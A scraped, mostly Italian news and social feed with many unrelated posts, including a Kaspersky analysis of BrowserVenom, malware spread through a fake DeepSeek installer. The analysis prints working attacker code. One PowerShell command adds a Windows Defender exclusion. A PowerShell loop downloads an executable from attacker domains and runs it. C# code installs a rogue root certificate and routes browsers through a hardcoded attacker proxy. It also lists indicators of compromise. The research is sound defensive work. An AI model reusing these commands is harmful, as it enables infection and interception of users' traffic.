Salta al contenuto principale



Un missile che cambia le carte in tavola? Kyiv svela l’Hrim-2

@Notizie dall'Italia e dal mondo

Le capacità di attacchi a lunga distanza di Kyiv sembrano essere giunte ad un punto di svolta. Lo scorso 6 giugno è stato infatti svelato un nuovo missile balistico sviluppato domesticamente, il quale sarebbe stato testato sul campo nel mese di maggio, quando è stato utilizzato per colpire con



All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world


Privacy International investigated eight of the most popular period-tracking apps to analyse how they function and process users’ reproductive health data. Their findings raised concerns for users’ privacy, given the sensitive nature of the health data involved. These findings come within the context of the global roll back on reproductive rights and fears over law enforcement forcing apps to hand over data.

The post All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world appeared first on European Digital Rights (EDRi).

reshared this



LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime


European Parliament's LIBE committee vote on a reform of the Europol Regulation was a mixed bag. Although it was a blow to the European Commission's original proposal, it still legitimised an expanding surveillance regime thanks to Europol's ever-growing power and resources. Read the Protect Not Surveil coalition’s statement.

The post LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime appeared first on European Digital Rights (EDRi).

reshared this



Bipolar Uranium Extraction from Seawater with Ultra-Low Cell Voltage


As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.
The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.

Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO2 deposited on the cathode and U3O8 on the anode.

Among the reported performance statistics of this prototype are the ability to extract UO22+ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.

The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.


hackaday.com/2025/06/11/bipola…



Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox


Mozilla ha sviluppato una nuova funzionalità di sicurezza che aiuterà a bloccare le estensioni dannose di Firefox che rubano criptovalute agli utenti. Gli sviluppatori segnalano che il nuovo sistema crea profili di rischio per ogni estensione del portafoglio presentata nello store e avvisa automaticamente dei rischi se viene raggiunta una soglia specificata.

Questi avvisi hanno lo scopo di incoraggiare le persone che esaminano i componenti aggiuntivi a esaminarli più attentamente e a rimuovere quelli dannosi dallo store prima che vengano utilizzati per svuotare i portafogli crittografici degli utenti.

“Per proteggere gli utenti di Firefox, il team Add-ons Operations ha sviluppato un sistema di pre-rilevamento progettato per identificare e bloccare le estensioni fraudolente per criptovalute prima che cadano nelle mani di utenti ignari”, afferma il team. “Il primo livello di protezione prevede indicatori automatici che determinano il profilo di rischio delle estensioni per wallet elencate su addons.mozilla.org.

Se un’estensione per wallet raggiunge un certo livello di rischio, i revisori umani vengono avvisati per condurre un’analisi più approfondita. Se l’estensione viene ritenuta dannosa, viene immediatamente bloccata.”

Andreas Wagner, specialista in operazioni di componenti aggiuntivi e responsabile del sistema di revisione dei contenuti e della sicurezza di addons.mozilla.org, sottolinea che negli ultimi anni il suo team ha scoperto e rimosso centinaia di estensioni dannose, tra cui wallet di criptovalute fraudolenti.

“È un continuo gioco del gatto e del topo, con gli sviluppatori che cercano di aggirare i nostri metodi di rilevamento”, spiega Wagner. “Controlla il sito web del tuo portafoglio di criptovalute per vedere se ha un’estensione ufficiale e usa solo quelle linkate sul sito ufficiale.”

L'articolo Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox proviene da il blog della sicurezza informatica.



IA vs cybercrime: OpenAI svela come ChatGPT ha fermato attacchi russi e cinesi nel 2025


@Informatica (Italy e non Italy 😁)
Un rapporto di OpenAI svela le tattiche di inganno e influenza guidate dall'IA e la risposta proattiva contro attori statali e criminali, in particolare russi e cinesi. Grazie a ChatGPT smantellati o interrotti cyber crimini,



Il fattore umano nella cyber security è ancora una criticità


@Informatica (Italy e non Italy 😁)
Il rischio umano nelle organizzazioni moderne rappresenta la priorità principale per i team di sicurezza informatica. La fotografia ce la regala il nono rapporto annuale sullo stato del settore, pubblicato da Mimecast e intitolato "The State of Human Risk 2025"
L'articolo Il fattore



Apple Intelligence ci riprova alla Wwdc 2025. Sarà la volta buona?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Attesa al varco della Worldwide Developer Conference 2025 Apple concentra l'attenzione sul maquillage grafico del proprio sistema operativo con novità che la pongono in scia al rivale Android di Google.



Toxic trend: Another malware threat targets DeepSeek



Introduction


DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure


The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek
Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer


The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA
The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks
Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

  1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
    The AES encryption information is hardcoded in the implant:
    TypeAES-256-CBC
    Key01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
    IV01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

    The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
    powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
    It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

  2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
    $b = $null;
    foreach($i in 0..1000000) {
    $s = if ($i - gt 0) {
    $i
    } else {
    ""
    };
    $d = "https://app-updater$s.app$ap";
    $b = (New - Object Net.WebClient).DownloadData($d);
    if ($b) {
    break
    }

    };
    if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
    [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
    Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
    } else {
    ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
    }
    At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

  3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.


Loaded implant: BrowserVenom


We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion


As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes


d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs
deepseek-platform[.]comMain phishing site
r1deepseek-ai[.]comDistribution server
app-updater1[.]appStage #2 servers
app-updater2[.]app
app-updater[.]app
141.105.130[.]106Malicious proxy

securelist.com/browservenom-mi…

#2


Apple Intelligence ci riprova alla Wwdc 2025. Sarà la volta buona?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Attesa al varco della Worldwide Developer Conference 2025 Apple concentra l'attenzione sul maquillage grafico del proprio sistema operativo con novità che la pongono in scia al rivale Android di Google.



Texas is about to ban all speech on campuses at night. Seriously.


Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.

A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.

As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”

Read the whole article here.


freedom.press/issues/texas-is-…



Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections


Since it came into force almost seven years ago, the European Union (EU)'s General Data Protection Regulation (GDPR) has set the global standard for data protection. It empowers people to control their personal data while holding businesses accountable for how they collect, process, and store that data. One would imagine that all of the above would cement the GDPR, but this crucial law is being threatened by a push for profit at any cost.

The post Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections appeared first on European Digital Rights (EDRi).

papapep reshared this.



Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal


EDRi, ECNL and Lighthouse Reports are excited to launch a series of online sessions to facilitate collaboration and information sharing between journalists and civil society actors.

The post Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal appeared first on European Digital Rights (EDRi).



Danimarca ’92 – Seconda puntata
freezonemagazine.com/rubriche/…
Come abbiamo visto nella prima parte, Richard Moeller Nielsen, commissario tecnico della nazionale di calcio danese, è chiamato a radunare in fretta e furia i suoi giocatori, ormai in procinto di partire per le ferie estive, per poter allestire la squadra che prenderà parte alla fase finale della nona edizione dei campionati europei di calcio, […]
L'articolo Danimarca ’92 – Seconda puntata




GRETA THUNBERG: “Noi rapiti da Israele. L’assalto alla Madleen è un crimine”


@Notizie dall'Italia e dal mondo
"Eravamo 12 volontari pacifici a bordo di una nave civile che trasportava aiuti umanitari in acque internazionali. Non abbiamo violato la legge. Non abbiamo fatto nulla di male", ha dichiarato ai giornalisti la giovane attivista svedese
L'articolo GRETA



E io che mi lamentavo della situazione italiana!




Did you know it’s not just two journalists who’ve been shot while covering the LA anti-ICE protests?

It’s many more. They appear to be targeting the press. Trying to silence them. Dissuade them from reporting on what is one of the most important issues America is facing.

Does the country want to submit to a fascist authoritarian?

Or do they want to fight back?

LA has chosen to fight back. And journalists are showing up to cover it. As they should.

Adam Rose is keeping a running tally on a thread on Bluesky. Highly recommend checking it out.

here’s some of the injured:

Ryanne Mena, shot with pepper balls

Sean Becker-Carmitchel, hit multiple times

Anthony Cabassa hit in face with chemical munition

Ryanne and Sean were hit again the next day, with a tear gas cannister

No name has been given but reports of someone from KTLA being hit with less lethal ammo and going to urgent care

Lauren Tomasi hit with less lethal ammo

Nick Stern shot with less lethal ammo and requires emergency surgery

These people were clearly identifying themselves as members of the press

They were there to do their jobs

And at least in the case of Lauren Tomasi, there’s video evidence which appears to show an officer taking clear aim and firing directly at her

Say their names.

Speak up.

The public need to know the risks the press are taking just to attempt to bring truth to the masses.

The Regime have been attempting to silence, sue and throttle the press since day one.

We shouldn’t tolerate any direct attacks on them.

#ice #abolishice #uspol #fascism #journalism #la #losangeles #resist




Le pasticche rosa di Grace
freezonemagazine.com/rubriche/…
Dietro le quinte del Festival di Woodstock la confusione è massima. Fuori cade una pioggia torrenziale su cinquecentomila ragazzi ammassati nel fango con poco da bere e da mangiare. Gli organizzatori del festival avevano stimato la presenza di 200.000 ragazzi e sono stati travolti dalla folla che in lunghe file ha raggiunto la fattoria di […]
L'articolo Le pasticche rosa di Grace proviene da FREE


Cosa faranno Nokia e Leonardo sulle reti wireless per le infrastrutture critiche (e non solo)

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Il gigante finlandese delle telecomunicazioni collabora con il colosso della difesa aerospazio italiano per fornire reti wireless private

reshared this



Nel frattempo, nella civilissima Reggio Emilia...

[accade spesso, tanto che diverse compagnie di noleggio hanno lasciato la città]



Dalla Newsletter di Haaretz


The U.K., Canada, Australia, New Zealand and Norway announced that they are imposing sanctions on Israeli ministers Itamar Ben-Gvir and Bezalel Smotrich, for inciting violence against Palestinians in the West Bank." In a joint statement, the five countries charged Ben-Gvir and Smotrich with inciting "extremist violence and serious abuses of Palestinian human rights."

The statement added that "the Israeli Government must uphold its obligations under international law, and we call on it to take meaningful action to end extremist, violent and expansionist rhetoric."

reshared this



In risposta al "Wilson" di oggi


Per chi non lo conoscesse, "Wilson" è il nuovo podcast di Francesco Costa, direttore del Post.

Nel numero di oggi Francesco Costa ha fatto alcune osservazioni, in parte condivisibili in parte no, per spiegare l'esito dei referendum.

A scanso di equivoci, premetto che per me che milito nella CGIL da quasi 15 anni questo referendum è stato una sconfitta tremenda. Non c'è nessun bicchiere mezzo pieno da guardare, c'è solo un bicchiere vuotissimo. Chi sta cercando di vedere la parte mezza piena del bicchiere (il mondo politico) si sta cimentando in un'opera ammirevole di free climbing sugli specchi che però mi sembra non avere alcuna consistenza sul piano dei contenuti.

Il segretario Landini ha affermato "Non abbiamo raggiunto il quorum. Non è una vittoria" che se da un lato non rende affatto l'idea di quanto sia stata una sconfitta pesante per tutti noi che ci abbiamo sperato e abbiamo lavorato per la sua riuscita, almeno ha il pregio di non attirare il ridicolo sui militanti della sua organizzazione. Ai militanti del PD non è andata altrettanto bene, e me ne dispiace; la ridicolaggine di certe affermazioni dei loro leader va ben oltre il giustificabile.

Per tornare al podcast, mi ha colpito innanzitutto la sicurezza con cui Francesco Costa ha individuato tutti i punti per cui, a suo parere, il referendum non doveva essere fatto, tutti i motivi che facevano capire fin dall'inizio che sarebbe andata male. Come scrivevo sopra, in parte concordo con le sue osservazioni, mi domando solo perché abbia aspettato il "dopo" per snocciolare le ragioni del fallimento e non l'abbia fatto prima. Mi è sembrato un tango ballato sulle note del senno di poi.

Ho anche riascoltato l'evergreen sulla "difficoltà dei quesiti", a suo dire troppo tecnici. Siamo un paese ben strano se ancora non abbiamo capito che un parere sul quesito non ce lo possiamo fare dentro la cabina, il giorno dei referendum, leggendo il testo sulla scheda, perché neanche il presidente dell'ordine degli avvocati ce la farebbe a raccapezzarsi tra quelle proposte di cancellare una parola sì e una no in leggi che rimandano ad altre leggi che rimandano ad altre leggi ancora. Il quesito lo si deve capire prima e altrove, nelle settimane che precedono il voto e sui giornali. Il Post ad esempio ha fatto diversi ottimi articoli e podcast sugli argomenti oggetto del referendum. Chi voleva capire di cosa si stava parlando lo poteva fare abbastanza facilmente informandosi al solito modo, leggendo e ascoltanto chi ne scriveva e ne parlava, non credo siamo un paese con bisogni educativi speciali.

E poi mi hanno colpito le assenze, quei temi che non ha toccato neanche di striscio. Provo a buttarne giù un paio.

Davvero non c'è nulla da dire sul fatto che venga indetta una consultazione e che il 70% dei votanti preferisca non andare a votare? Basta accennare, come è stato fatto nel podcast, al fatto che questi sono gli anni con il più gran numero di occupati a tempo indeterminato, che il problema dei licenziamenti non è sentito e che invece la gente si preoccupa dei salari che non crescono? Ma lo sa Francesco Costa quali sono le percentuali di metalmeccanici che partecipano agli scioperi per il rinnovo del loro contratto (quindi per il problema dei salari che non crescono)? Beh, nella mia azienda (150 impiegati) sono circa il 4%. Dov'è tutta questa gente che non si preoccupa dei licenziamenti e che vorrebbe invece occuparsi dei salari? A me sembra il solito "benaltrismo", quell'invenzione cognitiva in virtù della quale qualsiasi sia il problema c'è sempre un ottimo motivo per non occuparsene.

E ancora, è accettabile che in una consultazione referendaria il comportamento di chi non ha nulla da dire conti più di quello di chi invece ce l'ha qualcosa da dire? Possiamo aprire un dibattito sulla ragione per cui ci debba essere un quorum ai referendum abrogativi? Magari chi ritiene che il quorum sia utile ci potrebbe spiegare perché è utile solo sui referendum abrogativi e non, ad esempio, sui referendum costituzionali.

Perché ad un referendum sull'abolizione dell'articolo più insulso di una legge sulla materia più insulsa viene richiesto di garantire, tramite il raggiungimento di un quorum, che la decisione non sia presa da una minoranza di persone mentre ad un referendum costituzionale per l'approvazione di una riforma che sostituisse la Repubblica con la Monarchia, la Magistratura con le telefonate da casa e togliesse il diritto di voto a chi ha il cognome che inizia con "P" non verrebbe richiesto alcun quorum ma basterebbe il voto di una sola persona per procedere alla suddetta modifica?

E insomma, già perdere fa male, se poi bisogna anche elaborare il lutto con questi contributi del Post... sem a post!

#ilPost #referendum #CGIL



questo è matto da legare... ve lo dico io. matto e pericoloso. ha intenzione di invadere se stesso praticamente... l'esercito americano che invade gli stati uniti.


LOTTA AL TRAFFICO ILLECITO MARITTIMO. L’ESPERIENZA DEL PROGRAMMA SEACOP


La cooperazione internazionale è fondamentale nel contrasto ai traffici illeciti marittimi per diversi motivi: la natura transnazionale dei traffici: le rotte del traffico illecito (droga, armi, esseri umani, legname, ecc.) attraversano più giurisdizioni. Nessun Paese può affrontare efficacemente il problema da solo.La condivisione di informazioni e intelligence: la cooperazione consente lo scambio tempestivo di dati tra forze dell’ordine, dogane e autorità marittime. La standardizzazione delle procedure: operare con protocolli comuni facilita le operazioni congiunte e migliora l’efficacia dei controlli. La formazione e rafforzamento delle capacità: i Paesi con meno risorse possono beneficiare del supporto tecnico e formativo di partner più esperti. La risposta coordinata: le operazioni congiunte permettono di colpire simultaneamente più nodi della rete criminale.

### Il progetto SEACOP dell’Unione Europea

Il SEACOP (Seaport Cooperation Project) è un’iniziativa finanziata dall’Unione Europea, giunta alla sua sesta fase (SEACOP VI), che mira a rafforzare la cooperazione internazionale nella lotta contro il traffico illecito via mare.
Obiettivo principale è contrastare il traffico di droga e altri traffici illeciti (come il legname) attraverso il rafforzamento delle capacità operative e di intelligence nei porti di Africa, America Latina e Caraibi.
Le attività principali consistono nella creazione e supporto di Unità di Intelligence Marittima (MIUs) e Unità di Controllo Marittimo Congiunto (JMCUs); nella formazione di agenti locali su tecniche di ispezione, profilazione dei rischi e cooperazione internazionale; nella promozione della condivisione in tempo reale delle informazioni tra Paesi partner e agenzie europee come FRONTEX, MAOC-N, e le forze dell’ordine nazionali.

In sintesi, SEACOP rappresenta un esempio concreto di come la cooperazione internazionale possa tradursi in azioni operative efficaci contro le reti criminali transnazionali, contribuendo alla sicurezza globale e allo sviluppo sostenibile delle regioni coinvolte.

### SEACOP ed i Paesi del Caribe

Grazie a SEACOP, 13 paesi del Caribe hanno potuto aumentare la loro capacità di risposta ai pericoli marittimi, con oltre 120 sequestri di merci illecite e miglioramento della coordinazione nazionale e regionale.

Il progetto si basa su un approccio decentralizzato e rispondente alle esigenze della regione, formando “equipaggiamenti virtuali”, inter-agenzie che possono rispondere ai pericoli in modo rapido e efficace. In 10 anni, SEACOP ha formato oltre 750 ufficiali e ha migliorato la capacità di risposta dei paesi del Caribe ai pericoli marittimi.

### SEACOP VI


Il progetto SEACOP VI mira a combattere il traffico di stupefacenti e le reti criminali associate in America Latina, Caraibi e Africa Occidentale. L’obiettivo principale è interrompere i flussi illeciti e rafforzare la cooperazione tra le autorità responsabili della sicurezza dei confini e della lotta al crimine organizzato. Il progetto si concentra su tre obiettivi principali: rafforzare le capacità di analisi e identificazione di navi sospette, rinforzare le capacità di ricerca e intercettazione di merci illecite e migliorare la cooperazione e la condivisione di informazioni a livello regionale e transregionale.

Il progetto SEACOP VI è il sesto fase del progetto Seaport Cooperation e si concentra su una gamma più ampia di attività illecite, compresa la criminalità ambientale e i flussi illeciti transatlantici. Il progetto si avvale dell’esperienza di diverse agenzie europee e lavora in stretta collaborazione con le autorità locali per combattere il crimine organizzato e garantire la sicurezza dei confini.

### I principali successi di SEACOP

Operazione GRES-Atlantico-SUR (giugno-luglio 2024)
Questa iniziativa, nata nell’ambito di SEACOP, ha coinvolto Argentina, Brasile, Uruguay, Paraguay e Senegal e ha ottenuto risultati straordinari in appena un mese: oltre 5 tonnellate di cocaina sequestrate (4 tonnellate in Paraguay, 800 kg in Argentina, 380 kg in Brasile, 1 tonnellata di marijuana sequestrata in Paraguay, più di 10 arresti in operazioni coordinate, controlli su oltre 15 navi e container marittimi, numerosi controlli aerei e nei porti strategici come Santos (Brasile), Montevideo (Uruguay), Dakar (Senegal) e Asunción (Paraguay).
L’operazione ha dimostrato l’efficacia della condivisione di intelligence marittima e fluviale. Ha portato alla creazione di centri di coordinamento operativo in Argentina e Senegal. È in fase di espansione con il progetto GRES-Ports, che mira a rafforzare i controlli nei principali porti del Pacifico e dei Caraibi.
Il successo è stato possibile grazie alla collaborazione con: EMPACT (piattaforma europea contro le minacce criminali), MAOC-N (Centro di analisi e operazioni marittime), Progetto COLIBRI, EUROFRONT, e la Rete Iberoamericana dei Procuratori Antidroga (RFAI).
Questi risultati mostrano come SEACOP stia evolvendo da un progetto di formazione e capacity building a una rete operativa internazionale capace di colpire duramente le reti criminali transnazionali.


#SEACOP #UNIONEEUROPEA #UE #EU

@Politica interna, europea e internazionale



#USA-#Iran, diplomazia al limite


altrenotizie.org/spalla/10705-…


Nell'ambito della sua visita ufficiale in Montenegro, il Ministro Giuseppe Valditara, ha incontrato oggi il Ministro dell'Istruzione, della Scienza e dell'Innovazione del Montenegro, Anđela Jakšić-Stojanović.


Air traffic control (ATC) audio unearthed by an aviation tracking enthusiast then reviewed by 404 Media shows two Predator drones leaving, and heading towards, Los Angeles.#News
#News


Cantieristica e Difesa. Ecco la scommessa americana sul rilancio navale

@Notizie dall'Italia e dal mondo

Per rilanciare la Marina Militare statunitense, non servono solamente investimenti sulle infrastrutture cantieristiche, ma occorrono più ordini di navi da guerra. A dirlo è Wilson Beaver, analista dell’Heritage Foundation. Secondo il think tank di Washington, rivitalizzare la




A contract obtained by 404 Media shows that an airline-owned data broker forbids the feds from revealing it sold them detailed passenger data.#News
#News


La cruna dell'ago dei #Referendum


altrenotizie.org/primo-piano/1…


il quorum: l'assoluta vaccata. una mafiata tutta italiana. e gli italiani ci vanno a nozze con le porcherie, zozzi come sono.


Dal Vespucci alla subacquea. Talò guarda in profondità il ruolo della Marina

@Notizie dall'Italia e dal mondo

Il regno di mistero evocato da Verne nel romanzo “Ventimila leghe sotto i mari” è oggi crocevia strategico per dati, energia e sicurezza. Eppure il mondo sommerso rimane tutto da esplorare. Probabilmente conosciamo meglio la superficie di Marte rispetto ai fondali sottomarini. Abbiamo quindi



certo gli italiani... ai tempi di renzi erano tutti contro renzi e la sua legge sul lavoro. c'è il referendum per abrogare alcune schifezze ed ecco che gli italiani sono tutti renziani... ma la cosa più assurda sono le contestazioni alla sinistra sull'appoggio al referendum. erano a favore dei lavoratori. come faceva la sinistra a votare no?


Bill Roorback – Beep
freezonemagazine.com/news/bill…
In libreria dal 27 Giugno 2025 Dopo il successo di Vita fra i giganti arriva il nuovo romanzo di Bill Roorbach: Beep. La voce narrante? Una scimmia scoiattolo… Mentre cerca di addentrarsi nella foresta pluviale della Costa Rica per trovarsi una compagna, una dolce e graziosa scimmietta, Beep, s’imbatte in Inga, una gentile adolescente americana, in vacanza […]
L'articolo Bill Roorback – Beep pro
In libreria dal 27